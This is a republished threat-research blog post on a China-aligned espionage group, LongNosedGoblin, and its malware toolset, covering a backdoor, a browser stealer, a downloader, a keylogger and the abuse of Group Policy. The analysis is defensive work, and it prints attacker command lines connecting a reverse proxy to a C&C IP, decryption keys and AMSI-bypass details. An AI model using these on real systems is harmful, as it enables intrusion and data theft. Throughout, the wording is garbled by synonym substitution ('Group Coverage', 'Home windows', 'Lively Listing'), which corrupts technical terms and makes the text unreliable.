• About Us
  • Privacy Policy
  • Disclaimer
  • Contact Us
TechTrendFeed
  • Home
  • Tech News
  • Cybersecurity
  • Software
  • Gaming
  • Machine Learning
  • Smart Home & IoT
No Result
View All Result
  • Home
  • Tech News
  • Cybersecurity
  • Software
  • Gaming
  • Machine Learning
  • Smart Home & IoT
No Result
View All Result
TechTrendFeed
No Result
View All Result

LongNosedGoblin tries to smell out governmental affairs in Southeast Asia and Japan

Admin by Admin
December 21, 2025
Home Cybersecurity
Share on FacebookShare on Twitter


In 2024, ESET researchers seen beforehand undocumented malware within the community of a Southeast Asian governmental entity. This led us to uncover much more new malware on the identical system, none of which had substantial ties to any beforehand tracked risk actors. Based mostly on our findings, we determined to attribute the malicious instruments to a brand new China-aligned APT group that now we have named LongNosedGoblin.

The group employs a diverse customized toolset consisting primarily of C#/.NET functions, and, notably, makes use of Group Coverage to deploy its malware and transfer laterally throughout the techniques of focused entities. This blogpost particulars our discovery of LongNosedGoblin, goes over its identified campaigns, and dives into the toolset of the group.

Key factors of the report:

  • LongNosedGoblin is a newly found China-aligned APT group concentrating on governmental entities in Southeast Asia and Japan, with the objective of cyberespionage.
  • The group has been lively since no less than September 2023.
  • LongNosedGoblin makes use of Group Coverage to deploy malware throughout the compromised community, and cloud providers (e.g., Microsoft OneDrive and Google Drive) as command and management (C&C) servers.
  • One of many group’s instruments, NosyHistorian, is used to assemble browser historical past and determine the place to deploy additional malware, such because the NosyDoor backdoor.
  • NosyDoor is more than likely being shared by a number of China-aligned risk actors.
  • We offer an in depth evaluation of NosyHistorian, NosyDoor, NosyStealer, NosyDownloader, NosyLogger, and different instruments utilized by LongNosedGoblin.

Smells like hassle: Introducing LongNosedGoblin

LongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan, with the objective of conducting cyberespionage. As we already talked about: in its campaigns, LongNosedGoblin abuses Group Coverage – a mechanism for managing settings and permissions on Home windows machines, sometimes used with Lively Listing – to deploy malware and transfer laterally throughout the compromised community.

One of many important instruments in its arsenal is NosyHistorian, a C#/.NET utility that the group makes use of to gather browser historical past, which is then used to find out the place to deploy additional malware. This contains one other main LongNosedGoblin software, a backdoor that we named NosyDoor, which, in campaigns we noticed, used Microsoft OneDrive as its C&C server. NosyDoor additionally employs living-off-the-land strategies in its execution chain, particularly AppDomainManager injection. Lastly, a number of of the group’s instruments can bypass the Antimalware Scan Interface (AMSI), which allows antimalware merchandise to scan numerous scripts earlier than execution.

Discovery

In February 2024, we discovered unknown malware on a system of a governmental entity in Southeast Asia. The malware was used to drop a customized backdoor, which we later named NosyDoor. On the identical time, we seen that the compromise concerned not only one, however a number of machines from the identical entity, with the malware having been deployed through Group Coverage.

Further evaluation revealed that the identical victims have been additionally with a distinct malicious software distributed through Group Coverage, this one used for accumulating browser historical past. We named the software NosyHistorian. Whereas we discovered many victims affected by NosyHistorian in the midst of our unique investigation between January and March 2024, solely a small subset of them have been compromised by NosyDoor. Some samples of NosyDoor’s dropper even contained execution guardrails to restrict operation to particular victims’ machines.

Later, we recognized much more unknown malware on the victims’ machines: NosyStealer, which exfiltrates browser knowledge; NosyDownloader, which downloads and runs a payload in reminiscence; NosyLogger, a keylogger; different instruments like a reverse SOCKS5 proxy; and an argument runner (a software that runs an utility handed as an argument) that was used to run a video recorder, possible FFmpeg, to seize audio and video. The downloader was first recorded in our telemetry way back to September 2023.

Attribution

As a result of distinctive toolset, alongside using Group Coverage for lateral motion, we determined to attribute the assaults to a brand new China-aligned APT group, and named it LongNosedGoblin. We seen some overlap within the file paths talked about in a Kaspersky blogpost about ToddyCat exercise, an APT group with related concentrating on, however the malware in that report lacks code similarity with the malware thought of right here.

It also needs to be famous that in June 2025, the Russian cybersecurity firm Photo voltaic printed a blogpost on an APT group it refers to as Erudite Mogwai, which used a payload that carefully resembles LongNosedGoblin’s NosyDoor. Based on the authors, Erudite Mogwai focused the IT infrastructure of a Russian authorities group and Russian IT corporations, utilizing the LuckyStrike Agent backdoor in its operations.

Nevertheless, we can’t verify that Erudite Mogwai and LongNosedGoblin are one and the identical, as there’s a particular distinction in TTPs between the 2 teams. Notably, the Erudite Mogwai analysis doesn’t point out the abuse of Lively Listing Group Coverage for malware deployment – a method that’s fairly particular to LongNosedGoblin’s operations.

We later recognized one other occasion of a NosyDoor variant concentrating on a corporation in an EU nation, as soon as once more using totally different TTPs, and utilizing the Yandex Disk cloud service as a C&C server. Using this NosyDoor variant means that the malware could also be shared amongst a number of China-aligned risk teams. That is additional corroborated by Photo voltaic’s remark of the phrase Paid within the PDB path of NosyDoor, suggesting that the malware could also be commercially offered as a service – probably indicating it’s being bought or licensed to different risk actors.

Later campaigns

All through 2024, LongNosedGoblin was actively deploying NosyDownloader in Southeast Asia. In December of the identical 12 months, we detected an up to date model of NosyHistorian in Japan, however then noticed no subsequent exercise.

In September 2025, we started seeing renewed exercise of the group in Southeast Asia. As in earlier campaigns, the risk actor leveraged Group Coverage to ship NosyHistorian to focused machines.

Throughout this wave of assaults, we seen habits in line with Cobalt Strike utilization: a loader named oci.dll was downloaded on a single machine, with a payload named ocapi.edb loaded from disk. LongNosedGoblin then subsequently deployed the potential Cobalt Strike loader to chose machines through Group Coverage.

Moreover, we noticed that one other related part, mscorsvc.dll, was downloaded, with its payload saved in conf.ini. This loader was then deployed to victims’ machines utilizing Group Coverage, using the identical supply mechanism as oci.dll.

Nosing round: LongNosedGoblin’s toolset

NosyHistorian

NosyHistorian is a C#/.NET utility with a self-explanatory inner identify GetBrowserHistory, because it, certainly, collects browser historical past. Within the noticed campaigns, the attackers used this software to realize perception in regards to the machines within the compromised infrastructure. Based mostly on this data, they picked a small subset of particular victims to compromise additional with their NosyDoor backdoor.

We noticed the software being deployed through Group Coverage below the filename Historical past.ini, disguising the file as an INI file. In actuality, this can be a moveable executable (PE) file, with the objective more than likely being to mix in with different INI recordsdata generally saved within the Group Coverage cache listing.

NosyHistorian iterates over all customers on the machine and retrieves the browser historical past from Google Chrome, Microsoft Edge, and Mozilla Firefox. Every historical past database file is copied to a short lived listing after which uploaded to a particular hardcoded SMB share throughout the native community of the compromised group. NosyHistorian’s filename for every net browser’s historical past file is listed in Desk 1, the place corresponds to net browser profiles.

Desk 1. Crafted historical past filenames by NosyHistorian

Internet browser Filename
Google Chrome ___History
Microsoft Edge __edge_History
Mozilla Firefox __firefox__places.sqlite

Each this software and NosyDoor have related PDB paths and have been compiled from the E:Csharp listing, with the NosyHistorian PDB path being: E:CsharpSharpMiscGetBrowserHistoryobjDebugGetBrowserHistory.pdb.

NosyDoor

As acknowledged beforehand, the NosyDoor backdoor makes use of cloud providers, equivalent to Microsoft OneDrive, for its C&C server. The malware has a reasonably simple, three-stage chain of execution, depicted in Determine 1. The primary stage is a dropper that deploys the second stage, which includes a living-off-the-land assault utilizing the AppDomainManager injection approach, which is in flip used to execute the ultimate payload, the backdoor itself.

NosyDoor collects metadata in regards to the sufferer’s machine, together with the machine identify, username, the OS model, and the identify of the present course of, and sends all of it to the C&C. It then retrieves and parses job recordsdata with instructions from the C&C. The instructions permit it to exfiltrate recordsdata, delete recordsdata, and execute shell instructions, amongst different issues.

Figure 1. NosyDoor execution chain 1
Determine 1. NosyDoor execution chain

NosyDoor Stage 1 – dropper

The malware’s first stage is a dropper, particularly a C#/.NET utility with the inner identify OneClickOperation. Similar as NosyHistorian, it’s deployed through Group Coverage. We’ve got seen the dropper masquerade as a Registry Coverage file through the use of the filename Registry.pol, though we additionally noticed Registry.plo, which is rare (it might be a typo, or possibly the risk actors didn’t need the filename to battle with one other malicious file).

The dropper base64 decodes embedded recordsdata and decrypts them through Information Encryption Commonplace (DES) with each key and initialization vector set to UevAppMo (the primary eight bytes of the string UevAppMonitor), then drops them to C:WindowsMicrosoft.NETFramework with the next filenames:

  • SharedReg.dll
  • log.cached
  • netfxsbs9.hkf
  • UevAppMonitor.exe.config

These filenames have been chosen intentionally to mix in with present recordsdata, because the listing usually comprises recordsdata named SharedReg12.dll and netfxsbs12.hkf.

In its remaining steps, the dropper creates and begins a Home windows scheduled job with the identify OneDrive Reporting Process-S-1-5-21- below the Microsoft job folder, the place is a random GUID string. The scheduled job is answerable for executing the respectable UevAppMonitor.exe within the C:WindowsMicrosoft.NETFramework listing throughout system startup. The dropper copies the respectable file from C:WindowsSystem32 to the brand new location.

The newer samples additionally embody an execution guardrail that makes the dropper operate solely on victims’ computer systems with a particular machine identify (see Determine 2).

Figure 2. Dropper code
Determine 2. Dropper code with execution guardrails

NosyDoor Stage 2 – AppDomainManager injection

UevAppMonitor.exe is a respectable C#/.NET utility, which the malware copied from the C:WindowsSystem32 to the C:WindowsMicrosoft.NETFramework listing and used as a living-off-the-land binary, or LOLBin. Residing-off-the-land assaults abuse respectable instruments already current on the system. On this case, the applying is used to set off AppDomainManager injection through a configuration file. This method could make functions constructed within the .NET framework load malicious code as an alternative of the meant respectable code by making use of the AppDomainManager class.

When the applying is executed, it hundreds the configuration file proven in Determine 3, which makes the applying name the InitializeNewDomain methodology of the customized SharedReg class in SharedReg.dll. The configuration additionally units the ingredient’s enabled attribute to false in order that occasion tracing for Home windows is disabled.

Figure 3. Content of UevAppMonitor.exe.config with specified AppDomainManager
Determine 3. Content material of UevAppMonitor.exe.config with specified AppDomainManager

SharedReg.dll comprises code to bypass AMSI, from an open-source AV/EDR evasion framework referred to as inceptor. Aside from that, it base64 decodes the file netfxsbs9.hkf, decrypts the consequence through AES with key UevAppMonitor, padded with null bytes till its size is 16, initialization vector 0, and ultimately base64 decodes the consequence once more. The result’s NosyDoor, which is then executed. Any errors are written to the file error.txt within the C:WindowsMicrosoft.NETFramework listing.

NosyDoor Stage 3 – payload

NosyDoor’s third stage, the primary payload, is a C#/.NET backdoor with the inner identify OneDrive and with PDB path E:CsharpThomasServerThomasOneDriveobjReleaseOneDrive.pdb. As this identify suggests, the backdoor makes use of cloud providers, on this case Microsoft OneDrive, as a C&C server.

The total listing of metadata the backdoor collects consists of the next:

  • exterior IPv4 tackle,
  • native IPv4 tackle,
  • agent ID,
  • username,
  • machine identify,
  • present listing,
  • present course of (identify, ID, structure),
  • stage 3 native begin time,
  • present native time,
  • OS model,
  • CodeType (see Desk 3), and
  • AgentType (see Desk 3).

All collected metadata is encrypted through RSA after which uploaded to OneDrive because the file Read_.max. As soon as NosyDoor sends the metadata, it seems for instructions from the C&C in job recordsdata with .max extensions within the following listing:

–//

Every job file comprises an encrypted command, which is encapsulated with values taken from the backdoor’s configuration:

The command is then decoded with base64 and decrypted through AES with key and initialization vector 0. All instructions are described in Desk 2. Though the command CMD_TYPE_TASKSCHEDULER is talked about within the code, it’s not carried out in any of the noticed samples.

Desk 2. Instructions supported by NosyDoor

Command Description
CMD_TYPE_SHELL Execute a shell command.
CMD_TYPE_EXEC_ASM Load a .NET meeting.
CMD_TYPE_EXIT Stop NosyDoor.
CMD_TYPE_REMOVE Delete a file and listing its unique listing.
CMD_TYPE_DOWNLOAD Exfiltrate a file. Word that obtain and add instructions are right here named by way of the attacker’s perspective, treating the C&C machine because the native machine and the sufferer machine because the distant one.
CMD_TYPE_UPLOAD Add a file to the sufferer’s machine, delete it from OneDrive, and listing the listing the place the file was uploaded.
CMD_TYPE_DRIVES Get names and sizes of logical drives current on the machine.
CMD_TYPE_FILE_BROWSE Get hold of a listing itemizing, together with file icons.
CMD_TYPE_SLEEP Set the beaconing interval.
CMD_TYPE_TASKSCHEDULER Not carried out.
CMD_TYPE_Plugin Load a .NET meeting, instantly calling the strategy Plugin.Run.

After executing the command, NosyDoor performs the reverse steps – encrypts command output utilizing AES, encodes with base64, and encapsulates with the strings and . Every result’s saved on the C&C server in a file with a filename specifying native time (Unix timestamp multiplied by 100,000) and ending with the .max extension:

–///.max

If an exception happens throughout NosyDoor’s operation, the backdoor writes the exception message along with the native time to C:UsersPublicLibrariesthomas.log.

The backdoor comprises a customized dependency named Library that’s embedded as a useful resource through the use of Costura. It primarily comprises code associated to command processing, Microsoft OneDrive communication, and numerous helper strategies, whereas the primary binary handles the beaconing loop and reads a config file, using the library.

The configuration is saved within the file log.cached in encrypted kind. NosyDoor decrypts it through XOR with key SecretKey, base64 decodes it, then decrypts it through AES with key Thomas, stuffed with null bytes till its size is 16, and IV 0. This configuration might be seen in Determine 4.

{
    "ListenerID": 3,
    "FolderName": "Duis euismod, mi, ligula, mattis feugiat, pulvinar.",
    "AppID": "[redacted]",
    "RefreshToken": "[redacted]",
    "BaseUrl": "https://graph.microsoft.com/v1.0/drive",
    "TokenUrl": "https://login.microsoftonline.com/frequent/oauth2/v2.0/token",
    "CodeType": ".NET40",
    "AgentType": "OneDrive",
    "Scope": "offline_access recordsdata.readwrite",
    "Sleep": 66,
    "BeginDate": "08:51:00",
    "EndDate": "18:51:00",
    "Payload": {
        "Key": "583oq23aonxloet7",
        "MetaDataName": null,
        "TaskFolderName": "Risus blandit mattis",
        "ReceiveFolderName": "Felis posuere at",
        "Prepend": "

    
    
    IIS Home windows Server
    
    
    
        
"IIS"
", "PayloadPrepend": "Fames", "PayloadAppend": "Ipsum" } }

Determine 4. Decrypted configuration (log.cached, beautified)

The configuration values and specify the native time vary when NosyDoor operates. On this case, NosyDoor is lively solely between 8:51 am and 6:51 pm. As soon as authenticated, although, NosyDoor will course of instructions which can be nonetheless pending in a queue and ship response recordsdata no matter what time it’s.

NosyStealer

NosyStealer is used to steal browser knowledge from Microsoft Edge and Google Chrome. As illustrated in Determine 5, it has a four-stage chain of execution, with the stealer part being the final-stage payload.

Figure 5. NosyStealer execution chain )2)
Determine 5. NosyStealer execution chain

NosyStealer Stage 1 – DLL loader

The primary stage (pmp.exe) within the NosyStealer chain is a C/C++ utility. The noticed pattern merely hundreds a library named SERV.dll from disk and calls the exported operate Whats up.

NosyStealer Stage 2 – injector

We noticed two NosyStealer Stage 2 samples – one (SERV.dll) in our telemetry, and the opposite (msi.dll) uploaded to VirusTotal from Malaysia. Neither has the exported operate Whats up however each have the primary code in DllMain, i.e., the malicious code is run proper after the DLL is loaded. They’ve the next exports:

  • ??0Cv2dllnoinject@@QEAA@XZ
  • ??4Cv2dllnoinject@@QEAAAEAV0@$$QEAV0@@Z
  • ??4Cv2dllnoinject@@QEAAAEAV0@AEBV0@@Z
  • ?fnv2dllnoinject@@YAHXZ
  • ?nv2dllnoinject@@3HA

The subsequent-stage knowledge is loaded from the hardcoded path C:ProgramDataMicrosoftWDFMDE.dat. It’s decrypted through a single-byte XOR cipher with key 0x7A. The result’s Donut shellcode that’s injected into the operating pmp.exe course of (NosyStealer Stage 1) utilizing the CreateRemoteThread API within the SERV.dll case, and right into a newly created notepad.exe course of utilizing the SetThreadContext API within the msi.dll case.

NosyStealer Stage 3 – loader

As talked about within the NosyStealer Stage 2 – injector part, this stage is shellcode containing an embedded PE file that’s decrypted, loaded, and executed in reminiscence utilizing Donut’s reflective loader. The extracted binary is a C/C++ utility.

Like NosyDoor Stage 2 – AppDomainManager injection, this stage makes use of a identified approach to bypass AMSI. It patches the AmsiScanBuffer operate within the loaded amsi.dll with code that returns E_INVALIDARG (see Determine 6).

Figure 6. Hex-Rays decompiled code that patches AmsiScanBuffer
Determine 6. Hex-Rays decompiled code that patches AmsiScanBuffer

Then it creates a Home windows scheduled job with the identify Day by day Test Process that runs C:ProgramDataMicrosoftWDFpmp.exe (NosyStealer Stage 1) day-after-day with permissions of the native system account.

After patching the AMSI operate and persisting, it continues equally to the earlier stage – it decrypts the following stage from the hardcoded path C:ProgramDataMicrosoftWDFmfd.dat through a single-byte XOR cipher with key 0x7A, the place the ensuing blob is one other Donut shellcode, which is then executed.

NosyStealer Stage 4 – payload

Once more, like NosyStealer Stage 3 – loader, this stage is shellcode that decrypts, hundreds, and executes an embedded PE file in reminiscence utilizing Donut’s reflective loader. This time, the extracted binary is a Go utility that steals browser knowledge from the Microsoft Edge and Google Chrome net browsers. To take action, it downloads a file named config from Google Docs. When the file comprises a sufferer’s ID, NosyStealer reads Microsoft Edge and Google Chrome profile knowledge, archives it with tar, and encrypts it with a customized cipher.

NosyStealer then exfiltrates the encrypted tar archive to Google Drive. Determine 7 is an instance of the JSON-formatted configuration, embedded within the binary, required to entry Google Drive and Google Docs.

{
  "kind": "service_account",
  "project_id": "dev0-411506",
  "private_key_id": "[redacted]",
  "private_key": "[redacted]",
  "client_email": "dev0-660@dev0-411506.iam.gserviceaccount.com",
  "client_id": "[redacted]",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token",
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "client_x509_cert_url": 
"https://www.googleapis.com/robotic/v1/metadata/x509/dev0-660percent40dev0-411506.iam.gserviceaccount.com",
  "universe_domain": "googleapis.com"
}

Determine 7. NosyStealer configuration

NosyStealer additionally information errors and standing messages to a Google Docs file named log, which can embody data from multiple sufferer. The standing message contains the fixed 9, probably a sign of the NosyStealer model. The total standing message format, the place represents an inventory of native IPv4 addresses of community adapters, is as follows:

– – 9 – heartbeat

NosyDownloader

Analyzing ESET telemetry knowledge, we additionally discovered within the networks compromised by LongNosedGoblin numerous initially benign functions that had been patched with malicious code. This code comprises a downloader that we named NosyDownloader, which executes a series of obfuscated instructions handed to a spawned PowerShell course of as one lengthy command line argument, that means that the script will not be saved on disk. Each subsequent stage is encoded with base64, the place the final one is moreover deflated with gzip.

Every stage is briefly described in Desk 3. Like NosyDoor Stage 2 and NosyStealer Stage 3, the second stage right here additionally bypasses AMSI. On this case, NosyDownloader makes use of Matt Graeber’s reflection methodology and disabling script logging strategies made out there on GitHub to bypass AMSI.

Desk 3. NosyDownloader script phases

Stage Description
1 Decodes and executes Stage 2 in a newly created PowerShell course of that runs in a hidden window.
2 Bypasses AMSI, then decodes and executes Stage 3.
3 Decodes, decompresses, and executes Stage 4.
4 Downloads a payload and executes it in reminiscence with Invoke-Expression.

We suspect that NosyDownloader was used to deploy ReverseSocks5, NosyLogger, and an argument runner, as we noticed them within the span of 1 week after NosyDownloader was executed.

NosyLogger

We additionally recognized a C#/.NET keylogger that we named NosyLogger. It appears to be a modified model of the open-source keylogger DuckSharp, with the primary variations being that it doesn’t ship emails or translate logged keys into the Cyrillic alphabet.

The malware initially checks whether or not a debugger is current through the IsDebuggerPresent and CheckRemoteDebuggerPresent APIs; if not, it begins its keylogging performance.

Window identify, pressed keys, and pasted clipboard content material are accrued in reminiscence. NosyLogger encrypts these knowledge batches utilizing AES with the important thing D53FCC01038E20193FBD51B7400075CF7C9C4402B73DA7B0DB836B000EBD8B1C and a randomly generated initialization vector of fastened size, the place the vector is appended to the encrypted batch of information. The encrypted knowledge batch is then appended to the file on the hardcoded location C:WindowsTempTS_D418.tmp in hexadecimal string format. In that file, every encrypted knowledge batch is separated by a newline adopted by the string ENDBLOCK. This technique of encrypting and storing accrued knowledge to the file takes place each 10 seconds. This file will not be exfiltrated by NosyLogger.

Different deployed instruments

ReverseSocks5

Amongst different malware deployed by LongNosedGoblin, we discovered an open-source reverse SOCKS5 proxy, written in Go, referred to as ReverseSocks5. We found it after we seen the next command line arguments getting used:

-connect 118.107.234[.]29:8080 -psk “58fi04qQ” /F

The choice -psk is used to set a preshared key for encryption and authentication. The argument /F will not be dealt with by ReverseSocks5 and might be unintentional; this argument is usually used with schtasks create.

We then seen one other set of command line arguments (which wouldn’t have the /F argument anymore):

-connect 118.107.234[.]29:8080 -psk “15Kaf22N3b”

This second set corresponds to execution of ReverseSocks5, the place we noticed PowerShell because the guardian course of. NosyDownloader was additionally executed throughout this time, indicating that the pattern was in all probability deployed with it.

Argument runner

It is a C#/.NET utility with inner identify Binary; the only real goal of this software is to run an utility handed as an argument. We noticed the filename TCOEdge.exe as a part of the command line together with arguments which can be particular to the FFmpeg multimedia framework; it was used to document the display and seize audio, saving it to C:WindowsTempoutput.avi.

Conclusion

LongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan. Our evaluation of its campaigns revealed quite a few items of customized malware, which the group makes use of to conduct cyberespionage in opposition to its victims. Notably, LongNosedGoblin employs Group Coverage to carry out lateral motion throughout the compromised community.

For any inquiries about our analysis printed on WeLiveSecurity, please contact us at threatintel@eset.com. 
ESET Analysis gives personal APT intelligence experiences and knowledge feeds. For any inquiries about this service, go to the ESET Menace Intelligence web page.

IoCs

A complete listing of indicators of compromise (IoCs) and samples might be present in our GitHub repository.

Information

SHA-1 Filename Detection Description
4E3F6E9D0F443F4C42974A0551EEE957B498DA3D Historical past.ini MSIL/Spy.Agent.EUU NosyHistorian.
CD745BD2636F607CC4FB9389535BF3579321CA72 Historical past.ini MSIL/Spy.Agent.EUU NosyHistorian.
154A35DD4117DB760699C2092AFB307E94008506 Registry.plo MSIL/TrojanDropper.Agent.GBQ NosyDoor stage 1.
B1D4A283A9CCC9E34993DD2093A904AFBD88B9B9 Registry.pol MSIL/TrojanDropper.Agent.GBQ NosyDoor stage 1.
77D2A8CB316B7A470E76E163551A00BB16A696C5 Registry.plo MSIL/TrojanDropper.Agent.GBQ NosyDoor stage 1.
F93E449C5520C4718E284375C54BE33711505985 Registry.pol MSIL/TrojanDropper.Agent.GBQ NosyDoor stage 1.
1959E2198D6F81B2604DF7AC1F508AEB7A6FA07E SharedReg.dll MSIL/Kryptik.AJBA NosyDoor stage 2.
E0B44715BC4C327C04E63F881ECC087B7ACBD306 N/A MSIL/Agent.ESF NosyDoor stage 3.
43C8AE8561E7E3BF9CD748136C091099E5CBEEEE N/A MSIL/Agent.ESF NosyDoor stage 3.
D11FC2D6159CB8BA392B145B3EE4ADFA15DB4C83 N/A MSIL/Agent.ESF NosyDoor stage 3.
A0A80AC293645076EBAE393FF0A6A4229E2EDE1C pmp.exe Win64/Agent.DNY NosyStealer stage 1.
DDBBAE33E04A49D17DD24D85B637667B4407AE19 SERV.dll Win64/Agent.DNX NosyStealer stage 2.
60158C509446893B3B57D40DC4B4B3795FCDF369 HPSupportAssistant.exe PowerShell/TrojanDownloader.Agent.JJO NosyDownloader.
F5B7440EE25116A49EC5EE82507B353880217AC1 RTLWVern.exe PowerShell/Agent.BDR NosyDownloader.
85939C56BFCACD0993E6FB9F7CFD6137601FB7D4 hpSmartAdapter.exe Win32/Agent.AGIJ NosyDownloader.
C66F9FEC0F8CBF577840944F61198A75B3E2A58C hputils.exe Win32/Agent.AGII NosyDownloader.
4C2FCCE3BAB4144D90C741A6D77ADF209C786B54 IGCCSvc.exe MSIL/Spy.Keylogger.FVW NosyLogger.
161A25CB0B8FA998BF1BDEE31F06F24876453CDF AdobeHelper.exe WinGo/ReverseShell.DX ReverseSocks5.
4D61A9FBBCC4F7A37BE21548B55BB5B9B837F83B msi.dll Win64/Agent.DOT NosyStealer stage 2.
5AE440805719250AAEFEE9B39DACD23D2FB573CD TCOCertified.exe MSIL/Runner.BW Argument runner.
E93D32C739825519A10A4C52C5F1EE33936E4FDB N/A WinGo/PSW.Agent.FZ NosyStealer stage 4.
212126896D38C1EE57320FB6940FED7A6E30D9EA N/A Win32/Agent.AGHB NosyStealer stage 3.
CFFE15AA4D0F9E6577CCB509ACE9C588937943F2 HPNDFInterface.exe PowerShell/TrojanDownloader.Agent.JJO NosyDownloader.
6AC22CE60B706E3B9A7927633116911E1087C0D4 bemsvc.exe PowerShell/TrojanDownloader.Agent.JJO NosyDownloader.
2C1959DD85424CEDC96B1BB86A95FCA440CB9E36 HPDeviceCheck.exe Win32/Agent.AGWU NosyDownloader.
46107B1292B830D9BCEBBDA6EEDB32FBC05707B4 HP.OCF.exe Win32/Patched.NLL NosyDownloader.
581464978C29B2BC79C65766E62011C94D2CBEAB HP.OCF.exe Win32/Patched.NLL NosyDownloader.
0D91A0E52212EC44E32C47F7760AF3B473B72798 ax_installer.exe PowerShell/TrojanDownloader.Agent.JJO NosyDownloader.
48D715466857FB0C6CD0249DE6D960FC199438E1 btdevmanager.exe MSIL/Spy.Keylogger_AGen.DL NosyLogger.
563677CFACD328EA2478836E58A8BD0DF11206A3 information.txt MSIL/Spy.Agent.EUU NosyHistorian.
AC2264C56121141DAF751A3852CD34F3ACB1D63C ntrtscan.exe MSIL/Spy.Agent.EUU NosyHistorian.
70A615BC580522E1EEE4B61394DC7A247FE47022 ntrtscan.exe MSIL/Spy.Agent.EUU NosyHistorian.
E9C5E4AA335DFBD25786234A58CE4C9C551D1A41 oci.dll Win64/Kryptik_AGen.UW Loader of unknown malware (probably Cobalt Strike).
EC9CEB599DF3BDFFAD536900D0E6D48E2E5FF12B mscorsvc.dll Win64/Kryptik.EHP Loader of unknown malware (probably Cobalt Strike).

Community

IP Area Internet hosting supplier First seen Particulars
118.107.234[.]26 www.sslvpnserver[.]com IRT‑IPSERVERONE‑MY 2022‑04‑09 NosyDownloader C&C server.
103.159.132[.]30 www.threadstub[.]com IRT-FBP-MY 2023‑10‑03 NosyDownloader C&C server.
101.99.88[.]113 www.blazenewso[.]com Shinjiru Expertise Sdn Bhd 2024‑08‑23 NosyDownloader C&C server.
118.107.234[.]29 N/A IRT‑IPSERVERONE‑MY 2023‑03‑20 ReverseSocks5 server.
101.99.88[.]188 www.privatenesspolicy-my[.]com Shinjiru Expertise Sdn Bhd administrator 2024‑10‑23 NosyDownloader C&C server.
38.54.17[.]131 N/A Kaopu Cloud HK Restricted 2025‑03‑05 Server internet hosting malware, probably Cobalt Strike.

MITRE ATT&CK strategies

This desk was constructed utilizing model 18 of the MITRE ATT&CK framework.

Tactic ID Identify Description
Useful resource Improvement T1585.003 Set up Accounts: Cloud Accounts LongNosedGoblin created accounts on cloud-based providers for C&C communication.
T1588.001 Get hold of Capabilities: Malware LongNosedGoblin possible used shared malware that we named NosyDoor.
Execution T1059.001 Command and Scripting Interpreter: PowerShell NosyDownloader executes PowerShell instructions.
T1059.003 Command and Scripting Interpreter: Home windows Command Shell NosyDoor could execute instructions through cmd.exe.
T1106 Native API NosyStealer Stage 1 executes the following stage through the LoadLibraryW API.
Persistence T1053.005 Scheduled Process/Job: Scheduled Process NosyDoor and NosyStealer are endured utilizing Home windows scheduled duties.
T1574.014 Hijack Execution Circulate: AppDomainManager NosyDoor Stage 2 makes use of AppDomainManager injection to run malicious code.
Protection Evasion T1027.013 Obfuscated Information or Data: Encrypted/Encoded File Malicious recordsdata embedded in NosyDoor Stage 1 are encrypted through DES.
T1027.015 Obfuscated Information or Data: Compression NosyDownloader Stage 4 is compressed utilizing gzip.
T1622 Debugger Evasion NosyLogger doesn’t function if a debugger is current.
T1480 Execution Guardrails Some samples of NosyDoor function solely on machines with particular names.
T1564.003 Cover Artifacts: Hidden Window NosyDownloader creates a PowerShell course of with a hidden window.
T1562.001 Impair Defenses: Disable or Modify Instruments NosyDoor Stage 2, NosyStealer Stage 3, and NosyDownloader bypass AMSI.
T1036.005 Masquerading: Match Official Identify or Location NosyHistorian Stage 1 was noticed with the identify Registry.pol, masquerading as a Registry Coverage file.
T1218 Signed Binary Proxy Execution NosyDoor Stage 1 executes the following stage by leveraging the respectable UevAppMonitor.exe.
T1055 Course of Injection One noticed NosyStealer Stage 2 injects Stage 3 to pmp.exe through CreateRemoteThread. The opposite noticed pattern injects to notepad.exe through SetThreadContext with ResumeThread.
T1620 Reflective Code Loading Donut has been used to execute NosyStealer Stage 3 and Stage 4 in reminiscence.
Discovery T1217 Browser Data Discovery NosyHistorian collects browser historical past from Google Chrome, Microsoft Edge, and Mozilla Firefox.
T1083 File and Listing Discovery NosyDoor can listing recordsdata and directories.
T1082 System Data Discovery NosyDoor obtains system data as a part of C&C beaconing.
Assortment T1056.001 Enter Seize: Keylogging NosyLogger logs keystrokes.
T1125 Video Seize LongNosedGoblin has used video recording software program, possible FFmpeg, to seize audio and video.
T1560 Archive Collected Information NosyLogger encrypts collected knowledge through AES.
T1074.001 Information Staged: Native Information Staging NosyLogger shops pressed keys, window names, and clipboard content material to a file at a hardcoded path.
Command and Management T1071.001 Utility Layer Protocol: Internet Protocols NosyDownloader makes use of HTTP to obtain additional payload.
T1105 Ingress Instrument Switch NosyDoor and NosyDownloader can obtain and run subsequent payloads.
T1102.002 Internet Service: Bidirectional Communication NosyDoor makes use of Microsoft OneDrive as its C&C server. NosyStealer makes use of Google Docs to obtain a set off command and to ship debug messages, and Google Drive to exfiltrate browser knowledge.
T1573.001 Encrypted Channel: Symmetric Cryptography NosyDoor encrypts C&C command outputs through AES.
T1573.002 Encrypted Channel: Uneven Cryptography NosyDoor makes use of RSA to encrypt metadata that’s despatched to the C&C server.
Exfiltration T1567.002 Exfiltration Over Internet Service: Exfiltration to Cloud Storage NosyStealer exfiltrates browser knowledge to Google Drive.

Tags: affairsAsiagovernmentalJapanLongNosedGoblinsniffSoutheast
Admin

Admin

Next Post
8 Most Ignored Survival Horror Video games

8 Most Ignored Survival Horror Video games

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Trending.

Reconeyez Launches New Web site | SDM Journal

Reconeyez Launches New Web site | SDM Journal

May 15, 2025
Safety Amplified: Audio’s Affect Speaks Volumes About Preventive Safety

Safety Amplified: Audio’s Affect Speaks Volumes About Preventive Safety

May 18, 2025
Flip Your Toilet Right into a Good Oasis

Flip Your Toilet Right into a Good Oasis

May 15, 2025
Apollo joins the Works With House Assistant Program

Apollo joins the Works With House Assistant Program

May 17, 2025
Discover Vibrant Spring 2025 Kitchen Decor Colours and Equipment – Chefio

Discover Vibrant Spring 2025 Kitchen Decor Colours and Equipment – Chefio

May 17, 2025

TechTrendFeed

Welcome to TechTrendFeed, your go-to source for the latest news and insights from the world of technology. Our mission is to bring you the most relevant and up-to-date information on everything tech-related, from machine learning and artificial intelligence to cybersecurity, gaming, and the exciting world of smart home technology and IoT.

Categories

  • Cybersecurity
  • Gaming
  • Machine Learning
  • Smart Home & IoT
  • Software
